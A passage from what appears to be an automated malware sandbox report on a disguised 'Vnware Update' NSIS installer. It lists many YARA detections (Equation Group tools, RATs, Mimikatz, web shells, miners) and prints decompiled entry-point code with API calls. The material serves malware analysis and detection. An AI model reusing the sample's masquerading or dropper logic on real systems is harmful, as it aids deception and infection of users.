hack tool leaked by ShadowBrokers- file envisioncollision, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_cmsex, Description: Equation Group hack tool leaked by ShadowBrokers- file cmsex, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_DUL, Description: Equation Group hack tool leaked by ShadowBrokers- file DUL, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_slugger2, Description: Equation Group hack tool leaked by ShadowBrokers- file slugger2, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_jackpop, Description: Equation Group hack tool leaked by ShadowBrokers- file jackpop, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_epoxyresin_v1_0_0, Description: Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_estesfox, Description: Equation Group hack tool leaked by ShadowBrokers- file estesfox, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_elatedmonkey_1_0_1_1, Description: Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ftshell_ftshell_v3_10_3_0, Description: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__scanner_scanner_v2_1_2, Description: Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ghost_sparc_ghost_x86_3, Description: Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__jparsescan_parsescan_5, Description: Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__funnelout_v4_1_0_1, Description: Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__magicjack_v1_1_0_0_client, Description: Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ftshell, Description: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_noclient_3_3_2, Description: Equation Group hack tool set, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_Eternalromance, Description: Detects EquationGroup Tool - April Leak, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_Gen2, Description: Detects EquationGroup Tool - April Leak, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_ntevt, Description: Detects EquationGroup Tool - April Leak, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld, Description: Detects EquationGroup Tool - April Leak, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0, Description: Detects EquationGroup Tool - April Leak, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4, Description: Detects EquationGroup Tool - April Leak, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_scanner_output, Description: Detects output generated by EQGRP scanner.exe, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_xtremerat_1, Description: Yara detected Xtreme RAT, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PupyRAT, Description: Yara detected PupyRAT, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Joe Security Rule: dragos_crashoverride_moduleStrings, Description: IEC-104 Interaction Module Program Strings, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Dragos Inc Rule: Obfuscated_VBS_April17, Description: Detects cloaked Mimikatz in VBS obfuscation, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Obfuscated_JS_April17, Description: Detects cloaked Mimikatz in JS obfuscation, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, Author: unknown Rule: Fierce2, Description: This signature detects the Fierce2 domain scanner, Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx, Description: Web Shell - from files Shell [ci, Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, Author: unknown Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 00000013.00000003.464807403.0000000006D9C000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 00000013.00000002.542830535.0000000002FAE000.00000004.00000040.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Volgmer_Malware, Description: Detects Volgmer malware as reported in US CERT TA17-318B, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: ProcessInjector_Gen, Description: Detects a process injection utility that can be used ofr good and bad purposes, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazagne_PW_Dumper, Description: Detects Lazagne PW Dumper, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Markus Neis / Florian Roth Rule: SUSP_shellpop_Bash, Description: Detects susupicious bash command, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Tobias Michalski Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_dropper_script_Dec17_1, Description: Detects a supicious VBS script that drops an executable, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazarus_Dec_17_5, Description: Detects Lazarus malware from incident in Dec 2017, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Turla_Agent_BTZ_Gen_1, Description: Detects Turla Agent.BTZ, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_BAT_Strings, Description: Detects a string also used in Netwire RAT auxilliary, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Turla_Mal_Script_Jan18_1, Description: Detects Turla malicious script, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_Obfuscated_Mal_Feb18_1, Description: Detects malicious obfuscated VBS observed in February 2018, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_ScanCopyPDF_Feb18, Description: Auto-generated rule - file Scan Copy.pdf.com, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_msfconsole, Description: Detects Armitage component, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_OSX, Description: Detects Armitage component, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Silence_malware_2, Description: Detects malware sample mentioned in the Silence report on Securelist, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_Mimikatz, Description: Detects Invoke-Mimikatz String, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Florian Roth Rule: malware_apt15_royaldll, Description: DLL implant, originally rights.dll and runs as a service, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: David Cannings Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MiniRAT, Description: Yara detected Mini RAT, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ComRAT_XORKey, Description: Yara detected Turla ComRAT XORKey, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: Joe Security Rule: netwire, Description: detect netwire in memory, Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, Author: unknown Rule: Fierce2, Description: This signature detects the Fierce2 domain scanner, Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx, Description: Web Shell - from files Shell [ci, Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, Author: unknown Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 00000013.00000003.478269987.0000000002FAD000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: webshell_PHP_b37, Description: Web Shell - file b37.php, Source: 00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp, Author: Florian Roth Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 00000013.00000003.417846471.0000000002FAC000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 00000013.00000003.475887530.0000000006E3F000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.475715447.0000000006E30000.00000004.00000001.sdmp, Author: unknown Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000013.00000003.430903809.0000000006BA5000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: vnwareupdate.exe PID: 5432 Parent PID: 2540

General

Start time:	13:47:26
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\vnwareupdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1300'
Imagebase:	0x7ff7ca4e0000
File size:	10752 bytes
MD5 hash:	FA8AFFACE280644885152DE7CD3234EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: GZe6EcSTpO.exe PID: 5884 Parent PID: 5716 GZe6EcSTpO.exeCOMMON

Executed Functions

Function 0040320C, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				char _t188;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f40c = _t42;
				if(_t42 != 6) {
					_t118 = E00406338(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E004062CA(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E00406338(0xa);
				 *0x42f404 = E00406338(8);
				_t47 = E00406338(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f40f =  *0x42f40f | 0x00000040;
					}
				}
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x42f4d8 = _t47;
				SHGetFileInfoA(0x429830, 0, _t163 + 0x38, 0x160, 0); // executed
				E00405FA0("Vnware Update Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t159 = "\"C:\\Users\\hardz\\Desktop\\GZe6EcSTpO.exe\" ";
				E00405FA0(_t159, _t51);
				 *0x42f400 = 0x400000;
				_t53 = _t159;
				if("\"C:\\Users\\hardz\\Desktop\\GZe6EcSTpO.exe\" " == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405963(_t53,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t55;
				while(1) {
					_t121 =  *_t55;
					_t171 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405963(_t55,  *(_t163 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00405FA0("C:\\Users\\hardz\\Desktop",  &(_t55[2]));
										L30:
										_t156 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156); // executed
										_t59 = E004031DB(_t171);
										_t172 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402D63(_t174,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t184 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x42f4b4;
													if( *0x42f4b4 == 0) {
														L67:
														_t62 =  *0x42f4cc;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E00406338(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L65:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E004056BC( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f420 == 0) {
												L42:
												 *0x42f4cc =  *0x42f4cc | 0xffffffff;
												 *(_t163 + 0x18) = E004037CE( *0x42f4cc);
												goto L43;
											}
											_t152 = E00405963(_t159, 0);
											if(_t152 < _t159) {
												L39:
												_t181 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E00405627(_t184);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\hardz\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\hardz\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E0040560A();
														} else {
															E0040558D();
														}
														SetCurrentDirectoryA(_t156);
														_t188 = "C:\\Users\\hardz\\Desktop"; // 0x43
														if(_t188 == 0) {
															E00405FA0("C:\\Users\\hardz\\Desktop", _t161);
														}
														E00405FA0(0x430000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x430400 = "A";
														do {
															E00405FC2(0, 0x429430, _t156, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x120)));
															DeleteFileA(0x429430);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\GZe6EcSTpO.exe", 0x429430, 1) != 0) {
																E00405D7F(_t136, 0x429430, 0);
																E00405FC2(0, 0x429430, _t156, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x124)));
																_t93 = E0040563F(0x429430);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405D7F(_t136, _t156, 0);
													}
													goto L43;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E00405A26(_t181, _t152 + 4) == 0) {
													goto L43;
												}
												E00405FA0("C:\\Users\\hardz\\Desktop", _t153);
												E00405FA0("C:\\Users\\hardz\\Desktop", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L42;
											}
											_t109 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E004031DB(_t172);
										_t173 = _t112;
										if(_t112 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E004031DB(_t173);
										_t174 = _t117;
										if(_t117 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t140 = _t55[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L23:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t141 = _t55[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L19:
								 *0x42f4c0 = 1;
								goto L20;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x0040321c
0x00403220
0x00403228
0x0040322c
0x00403231
0x0040323d
0x00403246
0x0040324b
0x0040324e
0x00403255
0x0040325c
0x0040325c
0x00403255
0x0040325e
0x00403263
0x00403264
0x00403270
0x00403274
0x0040327a
0x00403288
0x0040328d
0x00403294
0x00403298
0x0040329c
0x0040329e
0x0040329e
0x0040329c
0x004032a6
0x004032ad
0x004032b3
0x004032c9
0x004032d9
0x004032de
0x004032e4
0x004032eb
0x004032f7
0x00403301
0x00403303
0x00403305
0x0040330a
0x0040330a
0x0040331a
0x00403320
0x004033e9
0x004033e9
0x004033eb
0x004033ed
0x00000000
0x00000000
0x00403329
0x0040332c
0x00403334
0x00403334
0x00403337
0x0040333c
0x0040333e
0x0040333e
0x0040333f
0x0040333f
0x00403344
0x00403347
0x004033d9
0x004033de
0x004033e3
0x004033e6
0x004033e8
0x004033e8
0x004033e8
0x00000000
0x0040334d
0x0040334d
0x0040334e
0x00403351
0x00403369
0x00403394
0x00403396
0x004033a9
0x004033d4
0x004033d7
0x004033f5
0x004033f8
0x00403401
0x00403406
0x0040340c
0x00403417
0x00403419
0x0040341e
0x00403420
0x00403478
0x0040347d
0x00403487
0x0040348e
0x00403492
0x00403526
0x00403526
0x0040352b
0x00403531
0x00403536
0x0040365a
0x00403660
0x004036dc
0x004036dc
0x004036e1
0x004036e4
0x004036e6
0x004036e6
0x004036ee
0x004036ee
0x00403670
0x00403678
0x0040367a
0x0040367b
0x00403688
0x0040369b
0x004036a3
0x004036a7
0x004036a7
0x004036af
0x004036b4
0x004036bb
0x004036c9
0x004036cb
0x004036d1
0x004036d3
0x00000000
0x00000000
0x00000000
0x004036bd
0x004036c3
0x004036c5
0x004036c7
0x004036d5
0x004036d7
0x00000000
0x004036d7
0x00000000
0x004036c7
0x004036bb
0x00403545
0x0040354c
0x0040354c
0x0040349e
0x00403516
0x00403516
0x00403522
0x00000000
0x00403522
0x004034a7
0x004034ab
0x004034e1
0x004034e1
0x004034e3
0x004034eb
0x0040355d
0x0040355f
0x00403566
0x0040356e
0x0040356e
0x00403579
0x0040357e
0x0040358d
0x00403591
0x00403592
0x0040359b
0x00403594
0x00403594
0x00403594
0x004035a1
0x004035a7
0x004035ad
0x004035b5
0x004035b5
0x004035c3
0x004035c8
0x004035da
0x004035e2
0x004035e8
0x004035f4
0x004035fa
0x00403604
0x0040361a
0x0040362b
0x00403631
0x00403638
0x0040363b
0x00403641
0x00403641
0x00403638
0x00403645
0x0040364b
0x0040364b
0x00403650
0x00403650
0x00000000
0x0040358d
0x004034ed
0x004034ef
0x004034fa
0x00000000
0x00000000
0x00403502
0x0040350d
0x00403512
0x00000000
0x00403512
0x004034d6
0x004034d8
0x004034dc
0x004034df
0x00000000
0x00000000
0x00000000
0x004034df
0x00000000
0x004034d8
0x00403428
0x00403434
0x00403439
0x0040343e
0x00403440
0x00000000
0x00000000
0x00403448
0x00403450
0x00403461
0x00403469
0x0040346b
0x00403470
0x00403472
0x00000000
0x00000000
0x00000000
0x00403472
0x00000000
0x004033d7
0x00403398
0x0040339b
0x0040339e
0x004033a4
0x004033a4
0x004033a4
0x004033a4
0x00000000
0x004033a4
0x004033a0
0x004033a2
0x00000000
0x00000000
0x00000000
0x004033a2
0x00403353
0x00403356
0x00403359
0x0040335f
0x0040335f
0x00000000
0x0040335f
0x0040335b
0x0040335d
0x00000000
0x00000000
0x00000000
0x0040335d
0x00000000
0x00000000
0x00000000
0x0040332e
0x0040332e
0x0040332e
0x0040332f
0x0040332f
0x00000000
0x0040332e
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403231
GetVersion.KERNEL32 ref: 00403237
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
OleInitialize.OLE32(00000000), ref: 004032AD
SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
GetCommandLineA.KERNEL32(Vnware Update Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
CharNextA.USER32(00000000,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,00000020,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,00000000,?,00000006,00000008,0000000A), ref: 0040331A
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

